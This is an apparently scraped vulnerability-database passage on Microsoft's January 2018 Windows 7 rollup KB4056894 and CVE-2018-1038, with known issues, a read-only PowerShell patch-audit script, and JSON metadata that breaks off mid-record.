ID KB4056894 Type mskb Reporter Microsoft Modified 2018-08-23T01:17:58
Description
<html><body><p>Learn more about update KB4056894, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes the improvements and fixes that were part of update <a data-content-id="4054518" data-content-type="article" href="" managed-link="" target="_blank">KB4054518</a> (released December 12, 2017) and addresses the following issues:</p><ul><li>Security updates to Windows SMB Server, Windows Kernel, Microsoft Graphics Component, Internet Explorer, and Windows Graphics.</li></ul><p>For more information about the resolved security vulnerabilities, see the <a href="https://portal.msrc.microsoft.com/security-guidance"><u>Security Update Guide</u></a>.</p></div><h2>Notes</h2><p><strong>Important</strong> Apply <a data-content-id="4100480" data-content-type="article" href="" managed-link="" target="_blank">KB4100480</a> immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel on the 64-bit (x64) version of Windows.
This vulnerability is documented in <a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038" managed-link="" target="_blank">CVE-2018-1038</a>. According to the KB4100480 article, computers that received this update, or any of the other January through March 2018 updates for Windows 7 SP1 and Windows Server 2008 R2 SP1, are not fully protected until KB4100480 or an update that supersedes it (KB4093108 or KB4093118) is installed.</p><h2>Known issues in this update</h2><div><table class="table"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Microsoft has reports of some customers on a small subset of older AMD processors getting into an unbootable state after installing this KB.<br/> <br/>To prevent this issue, Microsoft has temporarily paused Windows OS updates to devices with the affected AMD processors.</td><td><p>This issue is resolved in <a data-content-id="4073578" data-content-type="article" href="" managed-link="" target="_blank">KB4073578</a>.</p></td></tr><tr><td>Because of a compatibility issue that affects some versions of antivirus software, this update is offered only to computers on which the antivirus vendor (ISV) has set the "ALLOW REGKEY" shown in the Workaround column.</td><td><p>This issue is resolved in <a data-content-id="4093118" data-content-type="article" href="" managed-link="" target="_blank">KB4093118</a>. The following registry value is no longer required for the computer to detect and be offered this update:</p><p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat\cadca5fe-87d3-4b96-b7fb-a231484277cc</p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly update, SMB servers may experience a memory leak in some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the following registry value is set to 1:</p><p>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\LanManServer\Parameters\EnableEcp</p></td><td>This issue is resolved in <a data-content-id="4103718" data-content-type="article" href="" managed-link="" target="_blank">KB4103718</a>.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p>This update is downloaded and installed automatically from Windows Update.
To get the standalone package for this update, go to the <a href="http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4056894">Microsoft Update Catalog</a> website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the <a data-content-id="" data-content-type="" href="http://download.microsoft.com/download/A/E/4/AE4768D5-D156-43E4-BBAB-82784ED6C758/4056894.csv" target="_blank">file information for update 4056894</a>.</p></div></body></html>
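The three practitioner checks this KB implies (is the antivirus "ALLOW REGKEY" present, is the SMB EnableEcp leak precondition set, and was a January through March 2018 update installed on an x64 host without KB4100480 or an update that supersedes it) can be scripted. The following PowerShell is an added example for this page, not code from the Microsoft KB article. The registry paths and KB numbers come from the KB text on this page; the list of updates that carry the CVE-2018-1038 fix is limited to those this page names (KB4100480, KB4093108, KB4093118, KB4103718), so a host patched only with a later monthly rollup is an assumption the script does not cover and will be reported as exposed. Get-HotFix reports only what Win32_QuickFixEngineering records.

```powershell
# Added example (not from the Microsoft KB article). Read-only audit of a
# Windows 7 SP1 / Windows Server 2008 R2 SP1 host for:
#   1. the antivirus-compatibility "ALLOW REGKEY" under QualityCompat
#      (gated the January-March 2018 updates; KB4093118 dropped the requirement),
#   2. LanManServer EnableEcp = 1, the precondition for the SMB memory leak
#      fixed in KB4103718,
#   3. a January-March 2018 update installed on x64 without KB4100480 or an
#      update this page says supersedes it (CVE-2018-1038).
# Run from an elevated PowerShell prompt (PowerShell 2.0 or later).

$compatKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat'
$compatValue = 'cadca5fe-87d3-4b96-b7fb-a231484277cc'
$srvParams   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'

# Updates the KB4100480 article lists as requiring KB4100480 afterwards.
$needsKernelFix = @('KB4056897','KB4056894','KB4073578','KB4057400','KB4074598',
                    'KB4074587','KB4075211','KB4088875','KB4088878','KB4088881')
# KB4100480 plus the updates this page names as superseding it. Assumption:
# later cumulative rollups also carry the fix; extend this list for your estate.
$carriesKernelFix = @('KB4100480','KB4093108','KB4093118','KB4103718')

function Get-InstalledKB {
    # Get-HotFix reads Win32_QuickFixEngineering; IDs look like "KB4056894".
    Get-HotFix | ForEach-Object { $_.HotFixID.ToUpper() } | Sort-Object -Unique
}

function Test-Kb4056894State {
    $installed = @(Get-InstalledKB)
    $arch      = (Get-WmiObject Win32_OperatingSystem).OSArchitecture   # e.g. "64-bit"

    # 1. ALLOW REGKEY: $null when the value (or the whole key) is absent.
    $compatData = $null
    $compat = Get-ItemProperty -Path $compatKey -Name $compatValue -ErrorAction SilentlyContinue
    if ($compat) { $compatData = $compat.$compatValue }

    # 2. EnableEcp: $null when the value is absent (default behaviour).
    $ecpData = $null
    $ecp = Get-ItemProperty -Path $srvParams -Name EnableEcp -ErrorAction SilentlyContinue
    if ($ecp) { $ecpData = $ecp.EnableEcp }

    # 3. Which trigger updates and which fix-carrying updates are installed.
    $triggers = @($needsKernelFix   | Where-Object { $installed -contains $_ })
    $fixes    = @($carriesKernelFix | Where-Object { $installed -contains $_ })

    New-Object PSObject -Property @{
        OSArchitecture      = $arch
        QualityCompatData   = $compatData
        EnableEcp           = $ecpData
        # Leak precondition from the KB: EnableEcp = 1 and KB4103718 not yet installed.
        SmbLeakPrecondition = ($ecpData -eq 1 -and -not ($installed -contains 'KB4103718'))
        JanToMarUpdates     = $triggers
        KernelFixUpdates    = $fixes
        # CVE-2018-1038 is x64-only per the KB: a trigger update is present,
        # nothing carrying the fix is, and the OS is 64-bit.
        Cve20181038Exposed  = ($arch -like '64*' -and $triggers.Count -gt 0 -and $fixes.Count -eq 0)
    }
}

Test-Kb4056894State | Format-List
```

The QualityCompat value is documented by Microsoft as a REG_DWORD named with that GUID and set to 0; antivirus vendors set it once they confirmed compatibility with the January 2018 kernel changes, and from KB4093118 onward Windows Update no longer requires it. A result of Cve20181038Exposed = True on a host that you know carries a later rollup means the $carriesKernelFix list needs that rollup added, not that the host is unpatched.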
{"id": "KB4056894", "bulletinFamily": "microsoft", "title": "January 4, 2018\u2014KB4056894 (Monthly Rollup)", "description": "<html><body><p>Learn more about update KB4056894, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update\u00a0<a data-content-id=\"4054518\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4054518</a> (released December 12, 2017) and addresses the following issues:</p><ul><li>Security updates to Windows SMB Server, Windows Kernel,\u00a0 Microsoft Graphics Component, Internet Explorer, and Windows Graphics.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. 
This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Microsoft has reports of some customers on a small subset of older AMD processors getting into an unbootable state after installing this KB.<br/>\u00a0<br/>To prevent this issue, Microsoft will temporarily pause Windows OS updates to devices with impacted AMD processors at this time.</td><td><p><span>This issue is resolved in <a data-content-id=\"4073578\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4073578</a>.</span></p></td></tr><tr><td><span>Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</span></td><td><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p><span></span></p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1:</p><p>\u00a0HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</p></td><td>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr></tbody></table><p>\u00a0</p></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4056894\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/A/E/4/AE4768D5-D156-43E4-BBAB-82784ED6C758/4056894.csv\" target=\"_blank\">file information for\u00a0update 4056894</a>.</p></div></body></html>", "published": "2018-01-04T00:00:00", "modified": "2018-08-23T01:17:58", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://support.microsoft.com/en-us/help/4056894/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2018-1038"], "type": "mskb", "lastseen": "2021-01-01T22:52:32", "edition": 16, "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-1038"]}, {"type": "mskb", "idList": ["KB4088875", "KB4088878", "KB4074587", "KB4093118", "KB4074598", "KB4100480", "KB4093108", "KB4056897"]}, {"type": "exploitdb", "idList": ["EDB-ID:44581"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814173", "OPENVAS:1361412562310812848"]}, {"type": "threatpost", "idList": ["THREATPOST:F3ECBE2B14E2562BC2FD58AD4ABA5BC1", "THREATPOST:4A749C6BAE245B913C6360FD1697CE7C"]}, {"type": "thn", "idList": 
["THN:7354CA31230FA4D48BE905015B9C3B76"]}, {"type": "kaspersky", "idList": ["KLA11219"]}, {"type": "zdt", "idList": ["1337DAY-ID-30292"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:825B1704EC215DE72477ABECB37BD7CB"]}, {"type": "cisa", "idList": ["CISA:3D3E239B3E90E3844001DB05F0A3EA02"]}, {"type": "cert", "idList": ["VU:277400"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_MAR_4100480.NASL"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF"]}], "modified": "2021-01-01T22:52:32", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-01-01T22:52:32", "rev": 2}, "vulnersScore": 6.0}, "kb": "KB4056894", "msrc": "", "mscve": "", "msfamily": "", "msplatform": "", "msproducts": [], "supportAreaPaths": ["9087adda-9d1d-0ba1-1b0b-ad434f940308", "417baa75-0c45-df0a-8e65-960580d94f42"], "supportAreaPathNodes": [{"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "f825ca23-c7d1-aab8-4513-64980e1c3007", "name": "Windows 7", "parent": "1267d68d-d9f7-6020-0726-166b153ccbeb", "tree": [], "type": "productname"}, {"id": "1267d68d-d9f7-6020-0726-166b153ccbeb", "name": "Windows", "tree": [], "type": "productfamily"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}], "superseeds": ["KB3021952", "KB2876315", "KB2699988", "KB3100773", "KB3067505", "KB3153731", "KB3081320", "KB2633171", "KB2829361", "KB931768", "KB948590", "KB3156017", "KB3170377", "KB3101246", "KB3088195", "KB2904266", "KB941672", "KB3139852", "KB2868623", 
"KB896688", "KB3033395", "KB969805", "KB960225", "KB2977629", "KB3145739", "KB933729", "KB3079757", "KB2918614", "KB931784", "KB2660465", "KB913446", "KB981852", "KB3077657", "KB2868626", "KB908523", "KB3080446", "KB978886", "KB935840", "KB2508429", "KB3045171", "KB2817183", "KB2849470", "KB936021", "KB972260", "KB3177723", "KB2876331", "KB4012215", "KB980182", "KB2961072", "KB929969", "KB3161561", "KB2567053", "KB2850851", "KB3197868", "KB3087039", "KB978251", "KB914389", "KB3170455", "KB955839", "KB896422", "KB2957503", "KB2476687", "KB2544521", "KB2485376", "KB2957509", "KB2744842", "KB951746", "KB3140735", "KB2769369", "KB917953", "KB2790113", "KB2879017", "KB982802", "KB2845690", "KB2497640", "KB921503", "KB4015193", "KB2753842", "KB2707511", "KB923414", "KB2506223", "KB2360131", "KB3167679", "KB3121918", "KB2829530", "KB3153171", "KB2279986", "KB979683", "KB3093983", "KB2718523", "KB960714", "KB2530548", "KB3046306", "KB2562485", "KB2617657", "KB3046049", "KB2624667", "KB833989", "KB3013455", "KB2761451", "KB3139929", "KB2876217", "KB912919", "KB2965155", "KB2511455", "KB2724197", "KB890047", "KB3072595", "KB2658846", "KB2756822", "KB2556532", "KB969897", "KB968537", "KB3062577", "KB910620", "KB930178", "KB942615", "KB980232", "KB3185911", "KB2757638", "KB957097", "KB981550", "KB2923392", "KB956390", "KB3124000", "KB937143", "KB2158563", "KB973037", "KB893086", "KB2416400", "KB3072630", "KB2862973", "KB2855844", "KB2987107", "KB921398", "KB4038777", "KB955069", "KB2870699", "KB982381", "KB971468", "KB2898715", "KB2183461", "KB2799494", "KB3192321", "KB2586448", "KB2893984", "KB3108670", "KB920958", "KB958869", "KB958215", "KB3175024", "KB3023562", "KB3003381", "KB963027", "KB957280", "KB2862772", "KB3140410", "KB3087135", "KB2957189", "KB3097877", "KB3033929", "KB3067904", "KB2503658", "KB4012864", "KB2476490", "KB3175443", "KB2412687", "KB933566", "KB947864", "KB2647516", "KB941644", "KB3164033", "KB981957", "KB2981580", "KB944533", "KB956803", "KB3050514", 
"KB956841", "KB2847311", "KB3153199", "KB2976627", "KB2507618", "KB4041681", "KB2479628", "KB2792100", "KB2731847", "KB905915", "KB922760", "KB2563894", "KB3207752", "KB883939", "KB3146963", "KB3177725", "KB2778930", "KB3035131", "KB2601626", "KB2797052", "KB2909212", "KB958690", "KB2647170", "KB2758857", "KB2779562", "KB2691442", "KB981793", "KB2709162", "KB3003057", "KB2963952", "KB2655992", "KB978207", "KB2761226", "KB2863058", "KB2393802", "KB4022719", "KB2978668", "KB976098", "KB4015549", "KB956802", "KB4048957", "KB2639417", "KB2688338", "KB3000061", "KB2503665", "KB939653", "KB3161664", "KB2621146", "KB982214", "KB2633952", "KB4054518", "KB978037", "KB2834886", "KB3121212", "KB976325", "KB2555917", "KB951072", "KB938464", "KB3154070", "KB961063", "KB3101746", "KB2859537", "KB2813170", "KB2296199", "KB943460", "KB3069762", "KB2976897", "KB2808735", "KB2964736", "KB3038314", "KB2121546", "KB3148851", "KB2772930", "KB3073921", "KB3124280", "KB928090", "KB2675157", "KB3182203", "KB2507938", "KB896727", "KB3034196", "KB2570791", "KB3124001", "KB3123479", "KB3046482", "KB3049563", "KB3032359", "KB2618444", "KB971486", "KB3079904", "KB917159", "KB974455", "KB938127", "KB3156013", "KB2838727", "KB3203884", "KB3148198", "KB3057839", "KB2922229", "KB3170106", "KB980436", "KB2536275", "KB970238", "KB2567680", "KB3126041", "KB2559049", "KB2809289", "KB980218", "KB3058515", "KB3146706", "KB2939576", "KB3134214", "KB947890", "KB3184471", "KB3069392", "KB950759", "KB925486", "KB970653", "KB969947", "KB954211", "KB3036197", "KB941693", "KB3124275", "KB3002885", "KB2525694", "KB3138962", "KB957095", "KB942763", "KB2799329", "KB935966", "KB3168965", "KB2790655", "KB2719985", "KB2544893", "KB917422", "KB2588516", "KB2930275", "KB977165", "KB2160329", "KB3008923", "KB3164035", "KB3045999", "KB3160352", "KB3177186", "KB3100465", "KB933360", "KB3078071", "KB2592799", "KB953838", "KB3065822", "KB2722913", "KB3126593", "KB943484", "KB3126446", "KB3149090", "KB958687", "KB3162835", 
"KB2645640", "KB2872339", "KB3184122", "KB943055", "KB3104002", "KB912812", "KB2992611", "KB4025341", "KB3070102", "KB3034344", "KB2585542", "KB3061518", "KB975517", "KB3212646", "KB2676562", "KB924053", "KB918899", "KB2850869", "KB2840149", "KB2482017", "KB2712808", "KB2659262", "KB2207566", "KB3185330", "KB2779030", "KB3160005", "KB979306", "KB2913602", "KB2536276", "KB979559", "KB3072633", "KB4019264", "KB2962872", "KB3032323", "KB2360937", "KB938829", "KB917736", "KB2641653", "KB916281", "KB3185319", "KB3109094", "KB3087038", "KB3039066", "KB3063858", "KB2761465", "KB2883150", "KB2916036", "KB2778344", "KB2839229", "KB935839", "KB4034664", "KB2876284", "KB2926765", "KB3139940", "KB2993958", "KB2286198", "KB2846071", "KB949014", "KB3006226", "KB890923", "KB2079403", "KB2993651", "KB2443685", "KB2436673", "KB2875783", "KB2835361", "KB3134814", "KB2839894"], "parentseeds": ["KB4343900", "KB4516065", "KB4499164", "KB4577051", "KB4338818", "KB4530734", "KB4534310", "KB4571729", "KB4550964", "KB4462923", "KB4103718", "KB4512506", "KB4493472", "KB4565524", "KB4074598", "KB4480970", "KB4471318", "KB4489878", "KB4519976", "KB4580345", "KB4556836", "KB4486563", "KB4586827", "KB4561643", "KB4540688", "KB4284826", "KB4525235", "KB4507449", "KB4592471", "KB4503292", "KB4457144", "KB4093118", "KB4524157", "KB4467107", "KB4088875", "KB4537820"], "msimpact": "", "msseverity": "", "scheme": null}
{"cve": [{"lastseen": "2020-10-03T13:20:08", "description": "The Windows kernel in Windows 7 SP1 and Windows Server 2008 R2 SP1 allows an elevation of privilege vulnerability due to the way it handles objects in memory, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-02T13:29:00", "title": "CVE-2018-1038", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1038"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2018-1038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1038", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}], "mskb": [{"lastseen": "2021-01-01T22:44:19", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Describes a Windows kernel update for CVE-2018-1038</p><h2>Notice</h2><p>This 
update has been superceded by the following newer updates:</p><div class=\"indent\"><a href=\"https://support.microsoft.com/help/4093108\">April 10, 2018\u2014KB4093108 (Security-only update)</a><br/><a href=\"https://support.microsoft.com/help/4093118\">April 10, 2018\u2014KB4093118 (Monthly Rollup)</a></div><h2>Summary</h2><p>This update addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows.\u00a0This\u00a0vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>. Users must apply this update to be fully protected against this vulnerability if their computers were updated\u00a0on or after January 2018 by applying\u00a0any of the following updates.</p><table class=\"table\"><tbody><tr><td width=\"94\"><p><strong><span>KB article</span></strong></p></td><td width=\"569\"><p><strong><span>Title</span></strong></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4056897/windows-7-update-kb4056897\"><span>4056897</span></a></p></td><td width=\"569\"><p><span>January 3, 2018\u2014KB4056897 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4056894/windows-7-update-kb4056894\"><span>4056894</span></a></p></td><td width=\"569\"><p><span>January 4, 2018\u2014KB4056894 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4073578/unbootable-state-for-amd-devices-in-windows-7-sp1-windows-server-2008\"><span>4073578</span></a></p></td><td width=\"569\"><p><span>Unbootable state for AMD devices in Windows 7 SP1 and Windows Server 2008 R2 SP1</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4057400/windows-7-update-kb4057400\"><span>4057400</span></a></p></td><td width=\"569\"><p><span>January 19, 
2018\u2014KB4057400 (Preview of Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4074598/windows-7-update-kb4074598\"><span>4074598</span></a></p></td><td width=\"569\"><p><span>February 13, 2018\u2014KB4074598 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4074587/windows-7-update-kb4074587\"><span>4074587</span></a></p></td><td width=\"569\"><p><span>February 13, 2018\u2014KB4074587 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4075211/windows-7-update-kb4075211\"><span>4075211</span></a></p></td><td width=\"569\"><p><span>February 22, 2018\u2014KB4075211 (Preview of Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088875/windows-7-update-kb4088875\"><span>4088875</span></a></p></td><td width=\"569\"><p><span>March 13, 2018\u2014KB4088875 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088878/windows-7-update-kb4088878\"><span>4088878</span></a></p></td><td width=\"569\"><p><span>March 13, 2018\u2014KB4088878 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088881/windows-7-update-kb4088881\"><span>4088881</span></a></p></td><td width=\"569\"><p><span>March 23, 2018\u2014KB4088881 (Preview of Monthly Rollup)</span></p></td></tr></tbody></table><p>\u00a0</p><h2>Notes</h2><ul><li>This security update was updated on April 5, 2018 to address applicability issues in the original release of the update.</li><li>Applicability rules have been expanded for this update. 
Therefore, this update will be offered via Windows Update and Windows Server Update Service (WSUS) if any of the Security Only (SO) updates that are listed in the table above are applied.</li><li><span lang=\"EN-US\"><span>No specific functional changes have been made to this security update. Therefore, no additional action is needed if this update has already been applied.</span></span></li></ul><h2>Known issues</h2><p class=\"paragraph\"><span><span><span>Microsoft is not aware of any issues that affect this update currently.\u202f</span></span></span></p><h2>How to get this update</h2><div class=\"Ltr OutlineElement SCXW128312254\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Method 1: Windows Update</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><div class=\"Ltr OutlineElement SCXW169651968\"><p aria-level=\"3\" class=\"Paragraph SCXW169651968\" paraeid=\"{29912da6-6187-4172-a4e4-dc59cd717b1e}{207}\" paraid=\"1691347728\" role=\"heading\"><span class=\"SCXW169651968 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW169651968\">This update can be downloaded and installed from Windows Update.</span></span></p></div></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span>Method 2:</span><span> Windows Server Update Service </span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span><span><span><span>This update is now available for installation through WSUS.</span></span></span></span><span><span> 
</span></span></p></div></div></div><div class=\"faq-section\" faq-section=\"\"><div aria-label=\"Collapsible widget\" contenteditable=\"false\" role=\"region\" tabindex=\"-1\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Method 3:\u00a0<span class=\"NormalTextRun SCXW128312254\"><strong>Microsoft Update Catalog</strong></span><span class=\"EOP SCXW128312254\" data-ccp-props='{\"201341983\":2,\"335559738\":40,\"335559739\":0,\"335559740\":420}'>\u00a0</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span class=\"SCXW128312254 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW128312254\">To get the stand-alone package for this update, go to the </span></span><a class=\"Hyperlink SCXW128312254\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4100480\" rel=\"noreferrer\" target=\"_blank\">Microsoft Update Catalog</a><span class=\"SCXW128312254 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW128312254\"> website.</span></span><span class=\"EOP SCXW128312254\" data-ccp-props='{\"134233117\":true,\"134233118\":true,\"201341983\":2,\"335559739\":360,\"335559740\":297}'>\u00a0</span></p></div></div></div></div></div><h2>References</h2><p><span>Learn about the</span><a href=\"https://support.microsoft.com/en-us/kb/824684\" target=\"_blank\"><span> terminology</span></a><span> that Microsoft uses to describe software updates.</span></p></body></html>", "edition": 2, "modified": "2018-04-13T15:02:08", "id": "KB4100480", "href": "https://support.microsoft.com/en-us/help/4100480/", "published": "2018-04-13T15:02:08", "title": "Windows kernel update for CVE-2018-1038", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-01-01T22:46:30", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4056897, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. No new operating system features are\u00a0introduced in this update. Key changes include the following:</p><ul><li>Security updates to Microsoft Graphics Component, Windows Graphics, Windows Kernel, and Windows SMB Server.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see\u00a0the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. 
